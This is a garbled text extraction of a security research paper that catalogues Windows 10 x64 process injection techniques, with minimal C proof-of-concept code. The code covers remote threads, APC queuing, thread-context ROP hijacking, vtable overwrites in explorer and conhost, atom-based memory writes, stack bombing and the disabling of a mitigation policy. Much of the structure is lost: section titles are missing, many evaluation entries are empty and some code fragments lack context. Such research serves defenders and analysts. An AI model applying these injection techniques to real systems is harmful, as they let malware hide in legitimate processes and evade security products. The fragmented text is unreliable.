Windows Process Injection PDF
Windows Process Injection PDF
Introduction
Process injection in Windows appears to be a well-researched topic, with many techniques now known
and implemented to inject from one process to the other. Process injection is used by malware to gain
more stealth (e.g. run malicious logic in a legitimate process) and to bypass security products (e.g. AV,
DLP and personal firewall solutions) by injecting code that performs sensitive operations (e.g. network
access) to a process which is privileged to do so.
In late 2018, we decided to take a closer look at process injection in Windows. Part of our research
effort was to understand the landscape, with a focus on present-day platforms (Windows 10 x64 1803+,
64-bit processes), and there we came across several problems:
• We could not find a single location with a full list of all injection techniques. There are some
texts that review multiple injection techniques (hat tip to Ashkan Hosseini, EndGame for a nice
collection https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-
technical-survey-common-and-trending-process and to Csaba Fitzl AKA “TheEvilBit” for some
implementations https://github.com/theevilbit/injection), but they’re all very far from capturing
all (or almost all) techniques.
• The texts that describe injection techniques typically lump together “true injection techniques”
(the object of this paper) with other related topics, such as process hollowing and stealthy
process spawning. In this paper, we’re interested only in injection from one 64-bit process
(medium integrity) to another, already running 64-bit process (medium integrity).
• The texts often try to present a complete injection process, therefore mixing writing and
execution techniques, when only one of them is novel.
• Many texts target 32-bit processes, and it was not clear whether they apply to 64-bit processes.
• Many texts target pre-Windows 10 platforms, and it is not clear whether they apply to Windows
10, with its implementation changes and with its new security features.
• Some attacks require privilege elevation, and as such are not interesting.
• The texts that describe process injection lack analysis – discussion of requirements and
limitations, impact of Windows 10 security features, etc.
• The texts usually provide a PoC, but it’s “too well written” – meaning, the PoC checks for return
code, handles errors, handles 32-bit and 64-bit processes, edge conditions, etc. Also, the PoC
implements an end-to-end injection (not just the novel write/execute technique). As such, the
PoC becomes pretty big and difficult to follow.
In this paper, we address all the above issues. We provide the first comprehensive catalogue of true
process injection techniques in Windows. We categorize the individual techniques into write primitives
and execution methods. We test the techniques against 64-bit processes (medium integrity) running on
Windows 10 x64. We test them with and without process protection techniques (CFG, CIG), we analyze
each technique and explain its requirements and limitations. Finally, we provide stripped down,
minimalistic PoC code that works, and at the same time is short enough to clearly show the technique at
hand.
We tried to be as comprehensive as possible, i.e. really cover all different techniques. But of course, this
is a live document, as new techniques will surely be discovered, and as we probably missed a few. We
also tried to give credit to the original inventor of the technique, if we could find one. Again, this is
probably imperfect, and readers are encouraged to send us corrections.
Finally, we get back to our original goal, and describe a new injection technique that inherently bypasses
CFG.
1. Process spawning – these methods create a process instance of a legitimate executable binary,
and typically modify it before the process starts running. Process spawning is very “noisy” and as
such these techniques are suspicious, and not stealthy.
2. Injecting during process initialization – these methods cause processes that are beginning to
run, to load their code (e.g. AppInit DLLs). Typically these techniques require UAC elevation (due
to writing to privileged registry keys and/or privileged folders). Additionally, such methods are
typically mitigated by the Extension Point Disable Policy.
3. Injecting into running processes (“true process injection”) – these are the most interesting
techniques, which are the focus of this paper.
Injecting into running processes typically involves two sub-techniques: preparing memory in the target
process (which contains the payload – the logic to be run, either as native code, or as ROP chain stack),
and executing logic in the target process.
The present time landscape: Windows 10 64-bit (x64), and new security features
In recent years, Windows 10 (and the x64 hardware platform) gained a lot of popularity. This change of
landscape has a great impact on process injection techniques:
- x64 (vs. x86): In Windows x86, all calling conventions except fastcall place all arguments on the
stack. In x64, the calling convention places the first 4 arguments in registers (RCX, RDX, R8 and
R9), and the remaining arguments on stack. This makes it harder to design a payload for x64,
since such payload must control several registers in order to invoke a function. In x86, a payload
just needs to correctly arrange the stack in order for a function invocation to succeed.
Theoretically this could have been elegantly handled by the single byte instruction POPA
(opcode 0x61), which pops all data registers from stack, however this instruction is simply not
available in x64 mode.
- New security features: Windows 10 introduced several new process exploitation mitigation
features, which can be controlled via the SetProcessMitigationPolicy API (from the target
process). These are:
o CFG (Control Flow Guard): this is Microsoft’s implementation of the CFI (Control Flow
Integrity) concept for Windows (8.1, 10). The compiler precedes each indirect CALL/JMP
(CALL/JMP reg) with a call to _guard_check_icall to check the validity of the call target.
Validity is also provided by the compiler as a list of 16-byte aligned valid targets per
module (loaded to memory as a “bitmap” for fast access). Both caller module and callee
module must support CFG in order for it to be in effect.
o Dynamic Code prevention: this feature prevents the calling process from calling
VirtualAlloc with PAGE_EXECUTE_*, MapViewOfFile with FILE_MAP_EXECUTE option,
VirtualProtect with PAGE_EXECUTE_* etc. and reconfiguring the CFG bitmap via
SetProcessValidCallTargets (from
https://www.troopers.de/media/filer_public/f6/07/f6076037-85e0-42b7-9a51-
507986edafce/the_joy_of_sandbox_mitigations_export.pdf). Note that for e.g.
VirtualProtectEx, the policy enforced is the policy of the caller process.
o Binary Signature Policy (CIG – Code Integrity Guard): only allow modules signed by
Microsoft/Microsoft Store/WHQL to be loaded into the process memory. A weaker
control is Image Load Policy, which can prevent loading modules from remote locations
or files with low integrity label; This is enforced at the calling process.
o Extension Point Disable Policy: disable “extensions” that load DLLs into the process
space – AppInilt DLLs, Winsock LSP, Global Windows Hooks, IMEs (from
https://theryuu.github.io/ifeo-mitigationoptions.txt).
It should be noted that explorer.exe, the classic injection target, as well as several other native
Windows processes/applications (e.g. Edge’s broker processes) are protected with CFG, and the
Edge broker processes are protected almost to the maximum possible level with the above
techniques.
Per the above, our interest is in true process injection techniques for Windows 10 x64. Specifically:
Microsoft provides a standard API (SetProcessValidCallTargets) for “whitelisting” (from CFG perspective)
an arbitrary address in the target process. Tal Liberman from EnSilo described its internal
implementation as a call to ntdll!NtSetInformationVirtualMemory with VmInformationClass=
VmCfgCallTargetInformation (https://blog.ensilo.com/documenting-the-undocumented-adding-cfg-
exceptions).
HANDLE p = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_OPERATION, FALSE,
process_id);
MEMORY_BASIC_INFORMATION meminfo;
VirtualQueryEx(p, target, &meminfo, sizeof(meminfo));
CFG_CALL_TARGET_INFO cfg;
cfg.Offset = ((DWORD64)target) - (DWORD64)meminfo.AllocationBase;
cfg.Flags = CFG_CALL_TARGET_VALID;
SetProcessValidCallTargets(p, meminfo.AllocationBase, meminfo.RegionSize, 1,
&cfg);
We found a simple way to deactivate all other Windows protections (specifically CFG cannot be
deactivated in this manner) for Windows 10 version 1803. Microsoft provides a standard API
(SetProcessMitigationPolicy) for turning on/off these features in the process itself. This function needs
to be run from the target process and provided with 3 arguments – for example,
ProcessDynamicCodePolicy, a pointer to an array of
sizeof(PROCESS_MITIGATION_DYNAMIC_CODE_POLICY) zeros, and the size of the said array – which is
sizeof(PROCESS_MITIGATION_DYNAMIC_CODE_POLICY). Finding an array of zeros is trivial, e.g. the load
image address of ntdll.dll + 0x20. Running a target function with 3 arguments is possible via invoking
ntdll!NtQueueApcThread.
HANDLE th=OpenThread(THREAD_SET_CONTEXT, FALSE, thread_id);
ntdll!NtQueueApcThread(th, SetProcessMitigationPolicy,
(void*)ProcessDynamicCodePolicy, ((char*)GetModuleHandleA("ntdll")) + 0x20,
sizeof(PROCESS_MITIGATION_DYNAMIC_CODE_POLICY));
NOTE: this technique stopped working at Windows 10 version 1809 – once protection is set (by
SetProcessMitigationPolicy), it cannot be unset – SetProcessMitigationPolicy returns status
ERROR_ACCESS_DENIED.
Given that CFG can be turned off by the injecting process, why do we need to analyze for CFG? We
anticipate that the mere action of disabling (or attempt to) of a security feature by a process may be
monitored and possibly even prevented by security products. As such, in the future, injecting processes
may prefer to stay away from this exact functionality. Also, at some point in the future, Microsoft may
disable or restrict CFG manipulation (just like they did with SetProcessMitigationPolicy).
• Memory allocation
• Memory writing (using a memory write primitive)
• Execution
Sometimes the allocation and memory writing are technically carried out in the same step, using the
same API. Sometimes the memory allocation step is implicit, i.e. the memory is pre-allocated.
Sometimes it is impossible to separate memory writing from execution.
Oftentimes, memory allocation and writing is done multiple times before the execution step.
Evaluation Criteria
• Prerequisites
• Limitations
• CFG/CIG-readiness
• Controlled vs. uncontrolled write address
• Stability
• Prerequisites
• Limitations
• CFG/CIG-readiness
• Control over registers
• Cleanup required
In general, memory writing primitives require the target memory to be allocated. This can happen in
two ways:
1. The injector process can invoke VirtualAllocEx (or NtAllocateVirtualMemory) to allocate new
memory in the target process. In such a case, the injector can request this memory to be
readable and/or writable and/or executable. Note that “the default behavior for executable
pages allocated is to be marked valid call targets for CFG” (https://docs.microsoft.com/en-
us/windows/desktop/Memory/memory-protection-constants).
2. The injector process can designate an existing (allocated) memory within the target process, for
overwriting. There are several options:
a. Stack – either the stack in use, or area beyond the TOS. The stack is RW. Writing to the
stack requires addressing several considerations: (i) when writing beyond TOS, it should
be kept in mind that this area may be overwritten by subsequent calls to inner functions
or system functions; (ii) when writing before TOS, it should be kept in mind that this
overwrites existing stack used
b. Image – the data sections of some DLLs contain “spare” allocation beyond the actual
need of the static variables mapped to there. This “cave” is RW, and initialized with
zeros.
c. Heap – any data object allocated on the heap, whose address is known to the injector
process, can be theoretically used (though the memory area may be modified/recycled
as the object is manipulated or destroyed). Again – RW.
VirtualProtectEx can be used to assign different privileges (e.g. execution) to a memory region.
Note that “the default behavior for VirtualProtect [and VirtualProtectEx] protection change to
executable is to mark all locations as valid call targets for CFG”
(https://docs.microsoft.com/en-us/windows/desktop/Memory/memory-protection-constants).
A notable exception is ntdll!NtMapViewOfSection which can be invoked in such way that it allocates
memory for the section in the target process.
Code:
HANDLE h = OpenProcess(PROCESS_VM_WRITE | PROCESS_VM_OPERATION, FALSE,
process_id);
LPVOID target_payload=VirtualAllocEx(h,NULL,sizeof(payload), MEM_COMMIT |
MEM_RESERVE, PAGE_EXECUTE_READWRITE); // Or any other memory allocation technique
WriteProcessMemory(h, target_payload, payload, sizeof(payload), NULL);
Evaluation:
o Prerequisites: none
o Limitations: none
o CFG/CIG-readiness: not affected
o Controlled vs. uncontrolled write address: address is fully controlled
o Stability: stable
Code:
HANDLE h = OpenProcess(PROCESS_CREATE_THREAD, FALSE, process_id);
CreateRemoteThread(h, NULL, 0, (LPTHREAD_START_ROUTINE)LoadLibraryA,
target_DLL_path, 0, NULL);
Evaluation:
o Prerequisites: malicious DLL written to disk, memory write primitive, thread in alertable
state (only when using APC)
o Limitations: DllMain code runs in with loader-lock locked, hence some restrictions apply
(https://docs.microsoft.com/en-us/windows/desktop/dlls/dynamic-link-library-best-
practices)
o CFG/CIG-readiness: CIG prevents loading on non-Microsoft signed DLL. An attempt to do
so results in error 0xC0000428 (STATUS_INVALID_IMAGE_HASH – “The hash for image
%hs cannot be found in the system catalogs. The image is likely corrupt or the victim of
tampering.” - https://msdn.microsoft.com/en-us/library/cc704588.aspx)
o Control over registers: none (but typically not a problem due to linking)
o Cleanup required: none
Code:
HANDLE h = OpenProcess(PROCESS_CREATE_THREAD, FALSE, process_id);
CreateRemoteThread(h, NULL, 0, (LPTHREAD_START_ROUTINE) target_execution, RCX, 0,
NULL);
Evaluation:
Code:
HANDLE h = OpenThread(THREAD_SET_CONTEXT, FALSE, thread_id);
QueueUserAPC((LPTHREAD_START_ROUTINE)target_execution, h, RCX);
or
ntdll!NtQueueApcThread(h, (LPTHREAD_START_ROUTINE)target_execution, RCX, RDX, R8);
Evaluation:
o Prerequisites: Target address must be RX (at least). Thread must be in alertable state
o Limitations: none
o CFG/CIG-readiness: target entry point must be CFG-valid.
o Control over registers: RCX (also RDX and R8 if using NtQueueApcThread)
o Cleanup required: none.
Evaluation:
The SetThreadContext anomaly: for some processes, the volatile registers (RAX, RCX, RDX, R8-
R11) are set by SetThreadContext, for other processes (e.g. Explorer, Edge) they are ignored.
Best not rely on SetThreadContext to set those registers. Open research question: why does
SetThreadContext behave differently for some processes?
Since there’s no CFG check for SetThreadContext, we can also use ROP gadgets with a non-
executable arbitrary memory (stack). We use a “beyond the TOS” memory cell to store the new
stack address (so as not to modify the original stack).
Code for non-executable memory (ROP-chain):
HANDLE t = OpenThread(THREAD_GET_CONTEXT | THREAD_SET_CONTEXT, FALSE, thread_id);
SuspendThread(t);
CONTEXT ctx;
ctx.Rip = GADGET_pivot; // pop rsp; ret
ctx.Rsp -= 8;
WriteProcessMemory(p, (LPVOID)ctx.Rsp, &new_stack_address, 8, NULL); // Or any
other memory write technique
//make sure stack is 16-byte aligned before the return address; make sure there’s
enough space *below* the entry point for stack used by system calls, etc.
SetThreadContext(t, &ctx);
ResumeThread(t);
// Hijack thread
CONTEXT new_ctx = old_ctx;
new_ctx.Rip = GADGET_pivot;
new_ctx.Rsp -= 8;
WriteProcessMemory(p, (LPVOID)new_ctx.Rsp, &new_stack_address, 8, NULL);
SetThreadContext(t, &new_ctx);
ResumeThread(t);
wait_until_done(t, GADGET_loop);
Code:
HMODULE h = LoadLibraryA(dll_path);
HOOKPROC f = (HOOKPROC)GetProcAddress(h, "GetMsgProc"); // GetMessage hook
SetWindowsHookExA(WH_GETMESSAGE, f, h, thread_id);
PostThreadMessage(thread_id, WM_NULL, NULL, NULL); // trigger the hook
Evaluation:
o Prerequisites: malicious DLL written to disk, target process must have user32.dll loaded
(and a message loop thread)
o Limitations: none
o CFG/CIG-readiness: CIG prevents loading on non-Microsoft signed DLL. An attempt to do
so results in error 0xC0000428 (STATUS_INVALID_IMAGE_HASH – “The hash for image
%hs cannot be found in the system catalogs. The image is likely corrupt or the victim of
tampering.” - https://msdn.microsoft.com/en-us/library/cc704588.aspx)
o Control over registers: none (but typically not a problem due to linking)
o Controlled vs. uncontrolled write address: N/A
o Stability: good
o Cleanup required: no
// Write address of GADGET_loop to the target thread stack (used as part of the
Write Primitive)
CONTEXT new_ctx = old_ctx;
new_ctx.Rsp -= 8+0x58; // use 0x68 in version 1903
new_ctx.Rbx = GADGET_loop;
new_ctx.Rdi = new_ctx.Rsp+0x58; // use 0x68 in version 1903
new_ctx.Rip = GADGET_write;
SetThreadContext(t, &new_ctx);
ResumeThread(t);
wait_until_done(t, GADGET_loop);
Evaluation:
Evaluation:
o Prerequisites: A window belonging to the target process, that uses the extra window
bytes to store a pointer to an object with a virtual function table. Specifically, explorer’s
Shell Tray Window uses the first 8 extra window bytes to store a pointer to a CTray
object. Target address must be RX (at least)
o Limitations: none
o CFG/CIG-readiness: the execution target must be CFG-valid.
o Control over registers: none
o Cleanup required: yes. The original CTray object must be restored, and special
consideration must be given for the return state from the function
Cleanup: save the original CTray object address via GetWindowLongPtr(), restore it into RBX in
the payload, set EAX to 2 and return. Also, restore the original pointer (to the original CTray
object).
Full code (with cleanup and payload write), tailored for Explorer.exe:
HWND hWindow = FindWindowA("Shell_TrayWnd", NULL);
DWORD process_id;
GetWindowThreadProcessId(hWindow, &process_id);
DWORD64 old_obj = GetWindowLongPtrA(hWindow, 0);
HANDLE h = OpenProcess(PROCESS_VM_WRITE | PROCESS_VM_OPERATION, false,
process_id);
// Using VirtualAllocEx+WriteProcessMemory to write payload and obj, but other
memory writing techniques are welcome
LPVOID target_payload = VirtualAllocEx(h, NULL, sizeof(payload), MEM_COMMIT |
MEM_RESERVE, PAGE_EXECUTE_READWRITE);
WriteProcessMemory(h, target_payload, payload, sizeof(payload), NULL); // Make
sure payload sets eax=2 and rbx=old_obj before returning control. Also take care of stack
alignment if calling other functions
DWORD64 new_obj[2];
LPVOID target_obj = VirtualAllocEx(h, NULL, sizeof(new_obj), MEM_COMMIT |
MEM_RESERVE, PAGE_READWRITE);
new_obj[0] = (DWORD64)target_obj + sizeof(DWORD64); //&(new_obj[1])
new_obj[1] = (DWORD64)target_payload;
WriteProcessMemory(h, target_obj, obj, sizeof(new_obj), NULL);
SetWindowLongPtrA(hWindow, 0, (DWORD64)target_obj);
SendNotifyMessageA(hWindow, WM_PAINT, 0, 0);
Sleep(1);
SetWindowLongPtrA(hWindow, 0, old_obj);
Code:
HANDLE hm = OpenFileMapping(FILE_MAP_ALL_ACCESS,FALSE,section_name);
BYTE* buf = (BYTE*)MapViewOfFile(hm, FILE_MAP_ALL_ACCESS, 0, 0, section_size);
memcpy(buf+section_size-sizeof(payload), payload, sizeof(payload));
HANDLE h = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, FALSE,
process_id);
char* read_buf = new char[sizeof(payload)];
SIZE_T region_size;
for (DWORD64 address = 0; address < 0x00007fffffff0000ull; address += region_size)
{
MEMORY_BASIC_INFORMATION mem;
SIZE_T buffer_size = VirtualQueryEx(h, (LPCVOID)address, &mem,
sizeof(mem));
if ((mem.Type == MEM_MAPPED) && (mem.State == MEM_COMMIT) && (mem.Protect
== PAGE_READWRITE) && (mem.RegionSize == section_size))
{
ReadProcessMemory(h, (LPCVOID)(address+section_size-
sizeof(payload)), read_buf, sizeof(payload), NULL);
if (memcmp(read_buf, payload, sizeof(payload)) == 0)
{
// the payload is at address + section_size - sizeof(payload);
…
break;
}
}
region_size = mem.RegionSize;
}
Evaluation:
Our code handles the problem of consecutive NUL bytes by creating the sequence backwards
using an auxiliary atom of a single arbitrary non-NUL byte. Note that NUL bytes are created first,
and only then the non-NUL bytes are added.
If the payload starts with a NUL byte, it is still possible to write it by artificially prepending it with
at least one non-NUL byte (not shown in the code)
NOTE: the original atom bombing PoC did not directly address the issue of consecutive NUL
bytes. Instead, it assumed that the target memory is 0-filled (which is indeed the case for the
.data slack used by the original PoC).
The code below ignores the issue of maximum atom length (RTL_MAXIMUM_ATOM_LENGTH –
probably 255). Longer payloads need to be broken into chunks of up to 255 bytes.
Code:
HANDLE th = OpenThread(THREAD_SET_CONTEXT| THREAD_QUERY_INFORMATION, FALSE,
thread_id);
for (char* pos = payload; pos < (payload + sizeof(payload)); pos += strlen(pos)+1)
{
if (*pos == '\0')
{
continue;
}
ATOM a = GlobalAddAtomA(pos);
DWORD64 offset = pos - payload;
ntdll!NtQueueApcThread(th, GlobalGetAtomNameA, (PVOID)a,
(PVOID)(((DWORD64)target_payload) + offset), (PVOID)(strlen(pos)+1));
}
Evaluation:
Code:
HANDLE fm = CreateFileMappingA(INVALID_HANDLE_VALUE, NULL, PAGE_EXECUTE_READWRITE,
0, sizeof(payload), NULL);
LPVOID map_addr =MapViewOfFile(fm, FILE_MAP_ALL_ACCESS, 0, 0, 0);
HANDLE p = OpenProcess(PROCESS_VM_WRITE | PROCESS_VM_OPERATION, FALSE,
process_id);
memcpy(map_addr, payload, sizeof(payload));
LPVOID requested_target_payload=0;
SIZE_T view_size=0;
ntdll!NtMapViewOfSection(fm, p, &requested_target_payload, 0, sizeof(payload),
NULL, &view_size, ViewUnmap, 0, PAGE_EXECUTE_READWRITE );
target_payload=requested_target_payload;
Evaluation:
o Prerequisites: none
o Limitations: cannot write to allocated memory
o CFG/CIG-readiness: not affected
o Controlled vs. uncontrolled write address: address is fully controlled, but cannot be used
to write to an allocated memory. So it’s better to let Windows choose the address.
o Stability: good
Evaluation:
ntdll!NtResumeProcess(p);
Evaluation:
Evaluation:
o Prerequisites: The target process must own a window. The target address must be RX
(at least)
o Limitations: none
o CFG/CIG-readiness: the target execution address must be CFG-valid.
o Control over registers: none
o Cleanup required: yes. The original kernel callback table must be restored.
INPUT ip;
ip.type = INPUT_KEYBOARD;
ip.ki.wScan = 0;
ip.ki.time = 0;
ip.ki.dwExtraInfo = 0;
ip.ki.wVk = VK_CONTROL;
ip.ki.dwFlags = 0; // 0 for key press
SendInput(1, &ip, sizeof(INPUT));
Sleep(100);
PostMessageA(hWindow, WM_KEYDOWN, 'C', 0); // hWindow is a handle to the
application window
Evaluation:
Cleanup code:
// release the Ctrl key
Sleep(100);
ip.type = INPUT_KEYBOARD;
ip.ki.wScan = 0;
ip.ki.time = 0;
ip.ki.dwExtraInfo = 0;
ip.ki.wVk = VK_CONTROL;
ip.ki.dwFlags = KEYEVENTF_KEYUP;
SendInput(1, &ip, sizeof(INPUT));
Code:
DWORD conhost_id = conhostId(process_id);
HANDLE hp = OpenProcess(PROCESS_VM_READ|PROCESS_VM_WRITE | PROCESS_VM_OPERATION,
FALSE, conhost_id);
LPVOID target_payload = VirtualAllocEx(hp, NULL, sizeof(payload), MEM_COMMIT |
MEM_RESERVE, PAGE_EXECUTE_READWRITE);
WriteProcessMemory(hp, target_payload, payload, sizeof(payload), NULL);
LONG_PTR udptr = GetWindowLongPtr(hWindow, GWLP_USERDATA);
ULONG_PTR vTable;
ReadProcessMemory(hp, (LPVOID)udptr, (LPVOID)&vTable, sizeof(ULONG_PTR), NULL);
ConsoleWindow cw;
ReadProcessMemory(hp, (LPVOID)vTable, (LPVOID)&cw, sizeof(ConsoleWindow), NULL);
LPVOID target_cw = VirtualAllocEx(hp, NULL, sizeof(ConsoleWindow), MEM_COMMIT |
MEM_RESERVE, PAGE_READWRITE);
cw.GetWindowHandle = (ULONG_PTR)target_payload;
WriteProcessMemory(hp, target_cw, &cw, sizeof(ConsoleWindow), NULL);
WriteProcessMemory(hp, (LPVOID)udptr, &target_cw, sizeof(ULONG_PTR), NULL);
SendMessage(hWindow, WM_SETFOCUS, 0, 0);
WriteProcessMemory(hp, (LPVOID)udptr, &vTable, sizeof(ULONG_PTR), NULL);
NOTE: the process_id provided must have conshot.exe as its child (so when the application is
run from a command line, process_id must belong to the cmd.exe process). hWindow is a
window belonging to the process whose ID is process_id.
Evaluation:
a. Search for an (undocumented) ALPC control data structure that contains a callback.
b. Memory writing primitive is used to overwrite the callback address
c. The injecting process enumerates over all ports and attempts to connect to each one in
order to trigger the callback.
NOTE: in Windows 10 version 1903 the ALPC port is 46 (as opposed to 45 in earlier versions).
Evaluation:
o Prerequisites: process uses ALPC ports, target address must be RX (at least)
o Limitations: none
o CFG/CIG-readiness: the target execution address must be CFG-valid.
o Control over registers: none
o Cleanup required: yes. The original callback needs to be restored.
Evaluation:
Note that the 5 alertable functions call NtXXX functions which are simple wrappers around
SYSCALL (SleepEx -> NtDelayExecution, WaitForSingleObjectEx -> NtWaitForSingleObject,
WaitForMultipleObjectsEx -> NtWaitForMultipleObjects, SignalObjectAndWait ->
NtSignalAndWaitForSingleObject, RealMsgWaitForMultipleObjectsEx ->
NtUserMsgWaitForMultipleObjectsEx). These five NtXXX functions use the following template:
mov r10,rcx
mov eax,SERVICE_DESCRIPTOR
test byte ptr [SharedUserData+0x308],1
jne +3
syscall
ret
int 2E
ret
So these functions don’t use the stack, therefore RSP ==TOS contains the return address, hence
we know exactly where to place the ROP chain.
We can generalize this – knowing RIP usually allows us to determine where the return address
is, relative to RSP. The above case becomes a special case wherein the return address offset
relative to RSP is 0 (when RIP is NtXXX+0x14 for the five NtXXX functions named above).
Naïve code:
HANDLE ntdll= GetModuleHandleA("ntdll");
HANDLE t = OpenThread(THREAD_SET_CONTEXT | THREAD_GET_CONTEXT |
THREAD_SUSPEND_RESUME, FALSE, thread_id);
SuspendThread(t);
CONTEXT ctx;
ctx.ContextFlags = CONTEXT_ALL;
GetThreadContext(t, &ctx);
DWORD64 tos = (DWORD64)ctx.Rsp;
Of course, this technique ruins the current stack, so there’s no way to resume the original
thread flow. There are several alternatives:
• Backup the current stack first (using memmove), then restore it and the registers. Note:
in order to accommodate the backup stack, the stack can be grown by writing a dummy
value every 4KB (allocating a new page each time).
• Alternatively, the stack can be read by the injector process, using a memory read
primitive (e.g. ReadProcessMemory), and embedded in the payload.
• Pivot to a new memory immediately – this ruins only the return address, and another
QWORD above it (which is anyway reserved for the leaf function and unused by the 5
leaf functions mentioned above, hence can be safely overwritten with no need for
restoration). The payload needs to restore RSP and the return address (only).
As for restoring registers, the 5 leaf functions do not rely on volatile registers when transferring
control to the kernel, and thus it is safe to modify the volatile registers, but the non-volatile
registers must be restored. Keep in mind that calling other (system) functions from the payload
does not modify the non-volatile registers since they are restored before control is returned to
the main payload. Thus, if the payload is written to only use volatile registers, it will be safe
(with no need to restore registers).
// payload mustn’t modify non-volatile registers, must copy the saved return
address to the original tos location (e.g. using memmove)
// and must restore rsp and control when it’s done, e.g. using GADGET_pivot.
HANDLE t = OpenThread(THREAD_SET_CONTEXT | THREAD_GET_CONTEXT |
THREAD_SUSPEND_RESUME, FALSE, thread_id);
SuspendThread(t);
CONTEXT context;
context.ContextFlags = CONTEXT_ALL;
GetThreadContext(t, &context)
DWORD64 orig_tos = (DWORD64)context.Rsp;
DWORD64 tos = orig_tos-0x2000; // 0x2000 experimentally works…
// overwrite the original tos+8 with the new tos address (we don't need to restore
this since it's shadow stack and not used by the leaf function!)
for (int i = 0; i < sizeof(tos); i++)
{
(*NtQueueApcThread)(t, GetProcAddress(ntdll, "memset"), (void*)(orig_tos +
8 + i), (void*)(((BYTE*)&tos)[i]), 1);
}
ResumeThread(t);
Evaluation:
• Prerequisites: Thread must be in alertable state. Target address must be RX (at least)
• Limitations: none
• CFG/CIG-readiness: not affected.
• Control over registers: no
• Stability: since all memory writes are queued, and happen together, atomicity is not an
issue.
• Cleanup required: yes. The original thread state, stack and non-volatile registers need to
be restored.
Shatter-like Techniques
Summary of Techniques
Memory Allocation
Memory Write
Execution Techniques
Auxiliary technique
During our research, we discovered an auxiliary technique that can be helpful for future injection attack
development. This technique loads a system DLL into the target process, without writing its path to the
process.
Sometimes, it may be necessary to forcibly load a system DLL into a process, e.g. when a ROP gadget is
needed from such DLL. Generally, an execution method with target LoadLibraryA can be used to load a
DLL, provided the DLL path is in memory. Interestingly, kernelbase.dll contains a list of 1000+ system
DLLs (as NUL-terminated strings). So arbitrary system DLL loading is possible even without prior write
primitive. This list can be found in kernelbase!g_DllMap+8, which is a pointer to an array of structures,
each structure is 3 QWORDs, the first one points to a string which is a DLL name (ASCII, NUL-
terminated). The strings populate a consecutive area in the .rdata section, wherein each string is 8-byte
aligned.
Conclusions
This paper fills a major gap in documentation, analysis, update and comparison of true process injection
techniques for Windows 10 x64. Additionally, this paper presents a novel technique for writing data to
memory, and a related technique for execution, both unaffected by all Windows 10 process protection
methods.
All techniques are offered as a barebone PoCs and as interchangeable classes in a library which allows
“mix and match” style process injection coding.
Acknowledgements
Kudos to the EnSilo research team, to Odzhan, to Adam of Hexacorn and to Csaba Fitzl AKA TheEvilBit
for their research and innovation over the recent years.